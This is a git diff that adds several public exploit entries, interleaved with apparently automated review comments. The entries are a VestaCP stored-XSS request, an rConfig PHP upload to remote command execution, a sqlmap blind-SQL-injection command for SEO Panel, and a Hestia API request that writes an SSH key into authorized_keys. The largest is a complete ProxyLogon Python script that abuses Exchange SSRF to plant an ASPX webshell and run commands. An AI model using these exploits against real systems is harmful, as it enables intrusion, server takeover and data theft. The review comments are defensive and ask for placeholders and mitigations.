diff --git a/exploits/multiple/webapps/49662.txt b/exploits/multiple/webapps/49662.txt
new file mode 100644
index 000000000..714ad30d3
--- /dev/null
+++ b/exploits/multiple/webapps/49662.txt
@@ -0,0 +1,24 @@
+# Title: VestaCP 0.9.8 - 'v_interface' Add IP Stored XSS
+# Date: 07.03.2021
+# Author: Numan Türle
+# Vendor Homepage: https://vestacp.com
+# Software Link: https://myvestacp.com < 0.9.8-26-43
+# Software Link: https://vestacp.com < 0.9.8-26
+# Tested on: VestaCP
+
+POST /add/ip/ HTTP/1.1
+Host: TARGET:8083
+Connection: close
+Content-Length: 165
+Cache-Control: max-age=0
+Origin: https://TARGET:8083
+Content-Type: application/x-www-form-urlencoded
+User-Agent: USER-AGENT
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: https://TARGET:8083/add/ip/
+Accept-Encoding: gzip, deflate
+Accept-Language: en,tr-TR;
+Cookie: PHPSESSID=udiudv2k0707d6k3p3fi1n1qk0
+sec-gpc: 1
+
+token=04331c937aeb2d203889b3fb86fa75b2&ok=Add&v_ip=90.7.3.1&v_netmask=255.0.0.0&v_interface=&v_shared=on&v_owner=admin&v_name=&v_nat=&ok=Add
\ No newline at end of file
diff --git a/exploits/php/webapps/49178.bash b/exploits/php/webapps/49178.sh
old mode 100644
new mode 100755
similarity index 100%
rename from exploits/php/webapps/49178.bash
rename to exploits/php/webapps/49178.sh
diff --git a/exploits/php/webapps/49665.txt b/exploits/php/webapps/49665.txt
new file mode 100644
index 000000000..c34423e41
--- /dev/null
+++ b/exploits/php/webapps/49665.txt
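Review bot: The captured request in 49662.txt still carries what look like live session values, `Cookie: PHPSESSID=udiudv2k0707d6k3p3fi1n1qk0` and `token=04331c937aeb2d203889b3fb86fa75b2`, although the host and user agent were already replaced by `TARGET` and `USER-AGENT`; these should become placeholders as well, e.g. `Cookie: PHPSESSID=SESSION_ID` and `token=CSRF_TOKEN`. The header also has no `# Version:` line and no description, so the entry does not say which privilege is needed to submit the form or where the stored `v_interface` value is later rendered. A short comment such as `# Requires an authenticated panel session (v_owner=admin in the sample); affected builds are those below the versions listed under Software Link` would let defenders triage it, with the privilege level confirmed by the author since it is only inferred from the request.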
@@ -0,0 +1,70 @@
+# Exploit Title: rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated)
+# Date: 2021-03-17
+# Exploit Author: Murat ŞEKER
+# Vendor Homepage: https://www.rconfig.com
+# Software Link: https://www.rconfig.com/downloads/rconfig-3.9.6.zip
+# Version: rConfig v3.9.6
+# Install scripts  :
+# https://www.rconfig.com/downloads/scripts/install_rConfig.sh
+# https://www.rconfig.com/downloads/scripts/centos7_install.sh
+# https://www.rconfig.com/downloads/scripts/centos6_install.sh
+# Tested on: centOS 7
+# Notes : If you want to reproduce in your lab environment follow those links :
+# http://help.rconfig.com/gettingstarted/installation
+# then
+# http://help.rconfig.com/gettingstarted/postinstall
+
+# Description:
+rConfig, the open source network device configuration management tool, is vulnerable to Arbitrary File Upload to RCE in /lib/crud/vendors.crud.php with parameter 'vendorLogo'.
+
+The following steps can be carried out in duplicating this vulnerability.
+
+- Login the rConfig application with your credentials.
+- Repeat 
+
+POST /lib/crud/vendors.crud.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@5y4o1s35jvx342apl7392qrqxh3m7aw.burpcollaborator.net
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------122590832918963661283831488254
+Content-Length: 36619
+Origin: https://localhost
+Connection: close
+Referer: http://4hmnkrm42ug2n1to46m8lpapggmlp9e.burpcollaborator.net/ref
+Cookie: PHPSESSID=eafcfe393af7dc2a3dd9bd1ea0e9e49b
+Upgrade-Insecure-Requests: 1
+Cache-Control: no-transform
+
+-----------------------------122590832918963661283831488254
+Content-Disposition: form-data; name="vendorName"
+
+thisisrce
+-----------------------------122590832918963661283831488254
+Content-Disposition: form-data; name="vendorLogo"; filename="file.php"
+Content-Type: image/png
+
+
+-----------------------------122590832918963661283831488254
+Content-Disposition: form-data; name="add"
+
+add
+-----------------------------122590832918963661283831488254
+Content-Disposition: form-data; name="editid"
+
+
+-----------------------------122590832918963661283831488254--
+
+
+
+- Than go to http(s):///images/vendor/file.php
+
+Note: The file.php can be accessed without valid credentials.
+
+
+If you change the to
+
+and navigate the http(s):///images/vendor/file.php?cmd=id
+
+The `id` command will execute on server.
\ No newline at end of file
diff --git a/exploits/php/webapps/49666.txt b/exploits/php/webapps/49666.txt
new file mode 100644
index 000000000..f0db91ef8
--- /dev/null
+++ b/exploits/php/webapps/49666.txt
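Review bot: The sample request in 49665.txt carries scanner artefacts unrelated to the upload: the `User-Agent` ends in `root@5y4o1s35jvx342apl7392qrqxh3m7aw.burpcollaborator.net`, the `Referer` points at `4hmnkrm42ug2n1to46m8lpapggmlp9e.burpcollaborator.net`, and a concrete `PHPSESSID` is included. These should be replaced with neutral placeholders so that anyone replaying the request in a lab does not contact a third-party host. The description would also be more useful if it named the weakness the request suggests, namely that a part with `filename="file.php"` is accepted under `Content-Type: image/png` and, per the note, is then served from `/images/vendor/` without authentication. The matching mitigation belongs there too: validate the extension and content server-side and do not execute PHP from the upload directory.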
@@ -0,0 +1,15 @@
+# Exploit Title: SEO Panel 4.8.0 - 'order_col' Blind SQL Injection
+# Date: 17/02/2021
+# Exploit Author: Piyush Patil
+# Vendor Homepage: https://www.seopanel.org/
+# Software Link: https://github.com/seopanel/Seo-Panel/releases/tag/4.8.0
+# Version: 4.8.0
+
+
+# Reference - https://github.com/seopanel/Seo-Panel/issues/209
+
+Step 1 - Login to the SEO Panel with admin credentials.
+Step 2 - Go to archive.php
+Step 3 - Change "order_col" value to "*" and copy the request
+Command: sqlmap -r request.txt --batch --level 5 --risk 3 --dbms MYSQL
+--dbs --technique=T --flush-session
\ No newline at end of file
diff --git a/exploits/php/webapps/49667.txt b/exploits/php/webapps/49667.txt
new file mode 100644
index 000000000..76a810ab9
--- /dev/null
+++ b/exploits/php/webapps/49667.txt
@@ -0,0 +1,17 @@
+# Title: Hestia Control Panel 1.3.2 - Arbitrary File Write
+# Date: 07.03.2021
+# Author: Numan Türle
+# Vendor Homepage: https://hestiacp.com/
+# Software Link: https://github.com/hestiacp/hestiacp
+# Version: < 1.3.3
+# Tested on: HestiaCP Version 1.3.2
+
+curl --location --request POST 'https://TARGET:8083/api/index.php' \
+--form 'hash="HERE_API_KEY"' \
+--form 'returncode="yes"' \
+--form 'cmd="v-make-tmp-file"' \
+--form 'arg1="ssh-rsa HERE_KEY"' \
+--form 'arg2="/home/admin/.ssh/authorized_keys"' \
+--form 'arg3=""' \
+--form 'arg4=""' \
+--form 'arg5=""'
\ No newline at end of file
diff --git a/exploits/windows/local/49661.txt b/exploits/windows/local/49661.txt
new file mode 100644
index 000000000..a87863a93
--- /dev/null
+++ b/exploits/windows/local/49661.txt
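Review bot: Step 1 of 49666.txt requires admin credentials, but the title omits the `(Authenticated)` suffix that the rConfig entry in this same commit uses; for consistent triage it should read `SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (Authenticated)`, with the matching row in files_exploits.csv updated. The steps also never say which request on archive.php carries `order_col` or whether a fixed release exists, so one line summarising the status of the referenced issue 209 would make the entry self-contained. For remediation it is worth noting that a sort-column value cannot be bound as a query parameter and has to be checked against an allow-list of column names.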
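Review bot: 49667.txt has no description, so the reader has to infer from the curl form fields that `v-make-tmp-file` writes the content of `arg1` to the path given in `arg2` without restricting the destination. A short comment stating that, and that a valid API `hash` is a prerequisite, would make the impact and the required access clear; the title could carry `(Authenticated)` for the same reason. `# Version: < 1.3.3` implies the fix is in 1.3.3, which should be stated explicitly once confirmed against the vendor changelog. For defenders the entry should also say that affected hosts need API access on port 8083 restricted and their `authorized_keys` files audited for unexpected entries.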
@@ -0,0 +1,29 @@
+# Exploit Title: VFS for Git 1.0.21014.1 - 'GVFS.Service' Unquoted Service Path
+# Date: 2021-2-6
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: https://vfsforgit.org/
+# Software Link: https://github.com/microsoft/VFSForGit/releases/download/v1.0.21014.1/SetupGVFS.1.0.21014.1.exe
+# Version: 1.0.21014.1
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+
+# Service info:
+C:\Users\m507>sc qc GVFS.Service
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: GVFS.Service
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\GVFS\GVFS.Service.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : GVFS.Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+C:\Users\m507>
+
+
+# Exploit:
+This vulnerability could permit executing code during startup or reboot with the escalated privileges.
\ No newline at end of file
diff --git a/exploits/windows/remote/49663.py b/exploits/windows/remote/49663.py
new file mode 100755
index 000000000..eb4418278
--- /dev/null
+++ b/exploits/windows/remote/49663.py
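Review bot: The `# Exploit:` section of 49661.txt is a generic sentence and leaves out the precondition that decides whether the finding is exploitable. With `BINARY_PATH_NAME : C:\Program Files\GVFS\GVFS.Service.exe` the only path Windows tries first is `C:\Program.exe`, and under default ACLs a standard user cannot create files in the root of `C:`. The entry should say so, e.g. `# Note: only exploitable where a low-privileged user can write to C:\ (non-default permissions)`, and name the fix, which is quoting the service's binary path. The `LocalSystem` / `AUTO_START` values shown do support the stated impact once that precondition holds.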
@@ -0,0 +1,183 @@ +import requests +from urllib3.exceptions import InsecureRequestWarning +import random +import string +import sys + + +def id_generator(size=6, chars=string.ascii_lowercase + string.digits): + return ''.join(random.choice(chars) for _ in range(size)) + +if len(sys.argv) < 2: + print("使用方式: python PoC.py ") + print("使用方式: python PoC.py mail.btwaf.cn test2@btwaf.cn") + exit() + +proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"} +requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) +target = sys.argv[1] +email = sys.argv[2] +random_name = id_generator(4) + ".js" +user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" + +shell_path = "Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\test11.aspx" +shell_absolute_path = "\\\\127.0.0.1\\c$\\%s" % shell_path + +# webshell-马子内容 +shell_content = '' + +autoDiscoverBody = """ + + %s http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a + + +""" % email + +print("正在获取Exchange Server " + target+"权限") +print("=============================") +FQDN = "EXCHANGE01" +ct = requests.get("https://%s/ecp/%s" % (target, random_name), headers={"Cookie": "X-BEResource=localhost~1942062522", + "User-Agent": user_agent}, + verify=False,proxies=proxies) + +if "X-CalculatedBETarget" in ct.headers and "X-FEServer" in ct.headers: + FQDN = ct.headers["X-FEServer"] + + +ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ + "Cookie": "X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;" % FQDN, + "Content-Type": "text/xml", + "User-Agent": user_agent}, + data=autoDiscoverBody, + proxies=proxies, + verify=False + ) + +if ct.status_code != 200: + print(ct.status_code) + print("Autodiscover Error!") + exit() + +if "" not in str(ct.content): + print("Can not get LegacyDN!") + exit() + +legacyDn = 
str(ct.content).split("")[1].split(r"")[0] +print("Got DN: " + legacyDn) + +mapi_body = legacyDn + "\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00" + +ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ + "Cookie": "X-BEResource=Administrator@%s:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;" % FQDN, + "Content-Type": "application/mapi-http", + "X-Requesttype": "Connect", + "X-Clientinfo": "{2F94A2BF-A2E6-4CCCC-BF98-B5F22C542226}", + "X-Clientapplication": "Outlook/15.0.4815.1002", + "X-Requestid": "{E2EA6C1C-E61B-49E9-9CFB-38184F907552}:123456", + "User-Agent": user_agent +}, + data=mapi_body, + verify=False, +proxies=proxies + ) +if ct.status_code != 200 or "act as owner of a UserMailbox" not in str(ct.content): + print("Mapi Error!") + exit() + +sid = str(ct.content).split("with SID ")[1].split(" and MasterAccountSid")[0] + +print("Got SID: " + sid) +sid = sid.replace(sid.split("-")[-1],"500") + +proxyLogon_request = """%sS-1-1-0S-1-5-2S-1-5-11S-1-5-15S-1-5-5-0-6948923 +""" % sid + +ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ + "Cookie": "X-BEResource=Administrator@%s:444/ecp/proxyLogon.ecp?a=~1942062522;" % FQDN, + "Content-Type": "text/xml", + "msExchLogonMailbox": "S-1-5-20", + "User-Agent": user_agent +}, + data=proxyLogon_request, +proxies=proxies, + verify=False + ) +if ct.status_code != 241 or not "set-cookie" in ct.headers: + print("Proxylogon Error!") + exit() + +sess_id = ct.headers['set-cookie'].split("ASP.NET_SessionId=")[1].split(";")[0] + +msExchEcpCanary = ct.headers['set-cookie'].split("msExchEcpCanary=")[1].split(";")[0] +print("Got session id: " + sess_id) +print("Got canary: " + msExchEcpCanary) + +ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ + "Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; 
ASP.NET_SessionId=%s; msExchEcpCanary=%s" % ( + FQDN, msExchEcpCanary, sess_id, msExchEcpCanary), + "Content-Type": "application/json; ", + "msExchLogonMailbox": "S-1-5-20", + "User-Agent": user_agent + +}, + json={"filter": { + "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", + "SelectedView": "", "SelectedVDirType": "All"}}, "sort": {}}, + verify=False + ) + +if ct.status_code != 200: + print("GetOAB Error!") + exit() +oabId = str(ct.content).split('"RawIdentity":"')[1].split('"')[0] +print("Got OAB id: " + oabId) + +oab_json = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId}, + "properties": { + "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", + "ExternalUrl": "http://ffff/#%s" % shell_content}}} + +ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ + "Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % ( + FQDN, msExchEcpCanary, sess_id, msExchEcpCanary), + "msExchLogonMailbox": "S-1-5-20", + "Content-Type": "application/json; charset=utf-8", + "User-Agent": user_agent +}, + json=oab_json, + verify=False + ) +if ct.status_code != 200: + print("Set external url Error!") + exit() + +reset_oab_body = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId}, + "properties": { + "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", + "FilePathName": shell_absolute_path}}} + +ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ + "Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % ( + FQDN, msExchEcpCanary, sess_id, 
msExchEcpCanary), + "msExchLogonMailbox": "S-1-5-20", + "Content-Type": "application/json; charset=utf-8", + "User-Agent": user_agent +}, + json=reset_oab_body, + verify=False + ) + +if ct.status_code != 200: + print("写入shell失败了啊") + exit() + +print("成功了。马上就验证shell是否OK!") +print("POST shell:https://"+target+"/owa/auth/test11.aspx") +shell_url="https://"+target+"/owa/auth/test11.aspx" +print('code=Response.Write(new ActiveXObject("WScript.Shell").exec("whoami").StdOut.ReadAll());') +print("正在请求shell") +data=requests.post(shell_url,data={"code":"Response.Write(new ActiveXObject(\"WScript.Shell\").exec(\"whoami\").StdOut.ReadAll());"},verify=False) +if data.status_code != 200: + print("写入shell失败") +else: + print("权限如下:"+data.text.split("OAB (Default Web Site)")[0].replace("Name : ","")) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 73420466a..ed5498318 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
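Review bot: 49663.py is added without the title/date/author/version comment header that the other new entries in this commit carry, and its only comment (`# webshell-马子内容`) and most status messages are not in English. A header should name the affected and fixed Exchange builds and the identifier, e.g. `# CVE: <CVE-ID, not given on this page>`, and the comment should be translated. For defenders the header could also list the artefacts visible in the code: requests to `/ecp/<4 chars>.js` carrying an `X-BEResource` cookie, a change to the OAB virtual directory `ExternalUrl`, and a new `test11.aspx` under `FrontEnd\HttpProxy\owa\auth`. The hard-coded `proxies` pointing at `127.0.0.1:8080` and the `verify=False` on every request also deserve a comment saying they reflect a lab interception setup.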
@@ -11291,6 +11291,7 @@ id,file,description,date,author,type,platform,port 49655,exploits/windows/local/49655.py,"GeoGebra CAS Calculato‪r‬ 6.0.631.0 - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows, 49656,exploits/android/local/49656.py,"GeoGebra 3D Calculator 5.0.511.0 - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,android, 49660,exploits/windows/local/49660.py,"FastStone Image Viewer 7.5 - .cur BITMAPINFOHEADER 'BitCount' Stack Based Buffer Overflow (ASLR & DEP Bypass)",2021-03-17,"Paolo Stagno",local,windows, +49661,exploits/windows/local/49661.txt,"VFS for Git 1.0.21014.1 - 'GVFS.Service' Unquoted Service Path",2021-03-18,"Mohammed Alshehri",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -18411,6 +18412,7 @@ id,file,description,date,author,type,platform,port 49613,exploits/linux/remote/49613.py,"AnyDesk 5.5.2 - Remote Code Execution",2021-03-03,scryh,remote,linux, 49621,exploits/java/remote/49621.java,"CatDV 9.2 - RMI Authentication Bypass",2021-03-05,"Christopher Ellis",remote,java, 49629,exploits/windows/remote/49629.py,"Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2)",2021-03-09,1F98D,remote,windows, +49663,exploits/windows/remote/49663.py,"Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon)",2021-03-14,F5,remote,windows, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, 
@@ -43515,7 +43517,7 @@ id,file,description,date,author,type,platform,port
 49174,exploits/php/webapps/49174.txt,"Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover",2020-12-02,"Mufaddal Masalawala",webapps,php,
 49175,exploits/php/webapps/49175.txt,"Simple College Website 1.0 - 'page' Local File Inclusion",2020-12-02,Mosaaed,webapps,php,
 49177,exploits/php/webapps/49177.txt,"Car Rental Management System 1.0 - SQL Injection / Local File include",2020-12-02,Mosaaed,webapps,php,
-49178,exploits/php/webapps/49178.bash,"WordPress Plugin Wp-FileManager 6.8 - RCE",2020-12-02,"Mansoor R",webapps,php,
+49178,exploits/php/webapps/49178.sh,"WordPress Plugin Wp-FileManager 6.8 - RCE",2020-12-02,"Mansoor R",webapps,php,
 49180,exploits/php/webapps/49180.txt,"User Registration & Login and User Management System 2.1 - Cross Site Request Forgery",2020-12-03,"Dipak Panchal",webapps,php,
 49181,exploits/php/webapps/49181.txt,"Coastercms 5.8.18 - Stored XSS",2020-12-03,"Hardik Solanki",webapps,php,
 49182,exploits/multiple/webapps/49182.txt,"EgavilanMedia Address Book 1.0 Exploit - SQLi Auth Bypass",2020-12-03,"Mayur Parmar",webapps,multiple,
@@ -43833,15 +43835,19 @@ id,file,description,date,author,type,platform,port 49633,exploits/multiple/webapps/49633.py,"Atlassian JIRA 8.11.1 - User Enumeration",2021-03-10,"Dolev Farhi",webapps,multiple, 49634,exploits/hardware/webapps/49634.txt,"NuCom 11N Wireless Router 5.07.90 - Remote Privilege Escalation",2021-03-11,LiquidWorm,webapps,hardware, 49635,exploits/php/webapps/49635.txt,"MyBB OUGC Feedback Plugin 1.8.22 - Cross-Site Scripting",2021-03-11,0xB9,webapps,php, -49637,exploits/windows/webapps/49637.py,"Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon)",2021-03-11,testanull,webapps,windows, +49637,exploits/windows/webapps/49637.py,"Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon) (PoC)",2021-03-11,testanull,webapps,windows, 49639,exploits/php/webapps/49639.txt,"Monitoring System (Dashboard) 1.0 - 'uname' SQL Injection",2021-03-12,"Richard Jones",webapps,php, 49640,exploits/php/webapps/49640.py,"Monitoring System (Dashboard) 1.0 - File Upload RCE (Authenticated)",2021-03-12,"Richard Jones",webapps,php, 49642,exploits/php/webapps/49642.txt,"Zenario CMS 8.8.53370 - 'id' Blind SQL Injection",2021-03-15,"Balaji Ayyasamy",webapps,php, 49643,exploits/php/webapps/49643.txt,"MagpieRSS 0.72 - 'url' Command Injection and Server Side Request Forgery",2021-03-15,bl4ckh4ck5,webapps,php, -49644,exploits/php/webapps/49644.txt,"rConfig 3.9.6 - 'path' Local File Inclusion (Authenticated)",2021-03-15,5a65726f,webapps,php, +49644,exploits/php/webapps/49644.txt,"rConfig 3.9.6 - 'path' Local File Inclusion (Authenticated)",2021-03-15,"Murat ŞEKER",webapps,php, 49649,exploits/multiple/webapps/49649.txt,"openMAINT openMAINT 2.1-3.3-b - 'Multiple' Persistent Cross-Site Scripting",2021-03-15,"Hosein Vita",webapps,multiple, 49650,exploits/multiple/webapps/49650.py,"Sonlogger 4.2.3.3 - SuperAdmin Account Creation / Information Disclosure",2021-03-15,"Berkan Er",webapps,multiple, 49651,exploits/multiple/webapps/49651.rb,"SonLogger 4.2.3.3 - 
Unauthenticated Arbitrary File Upload (Metasploit)",2021-03-15,"Berkan Er",webapps,multiple, 49652,exploits/php/webapps/49652.py,"Alphaware E-Commerce System 1.0 - Unauthenicated Remote Code Execution (File Upload + SQL injection)",2021-03-16,"Christian Vierschilling",webapps,php, 49657,exploits/php/webapps/49657.txt,"WoWonder Social Network Platform 3.1 - 'event_id' SQL Injection",2021-03-17,securityforeveryone.com,webapps,php, 49659,exploits/multiple/webapps/49659.html,"VestaCP 0.9.8 - File Upload CSRF",2021-03-17,"Fady Mohammed Osman",webapps,multiple, +49662,exploits/multiple/webapps/49662.txt,"VestaCP 0.9.8 - 'v_interface' Add IP Stored XSS",2021-03-18,"numan türle",webapps,multiple, +49666,exploits/php/webapps/49666.txt,"SEO Panel 4.8.0 - 'order_col' Blind SQL Injection",2021-03-18,"Piyush Patil",webapps,php, +49667,exploits/php/webapps/49667.txt,"Hestia Control Panel 1.3.2 - Arbitrary File Write",2021-03-18,"numan türle",webapps,php, +49665,exploits/php/webapps/49665.txt,"rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated)",2021-03-18,"Murat ŞEKER",webapps,php,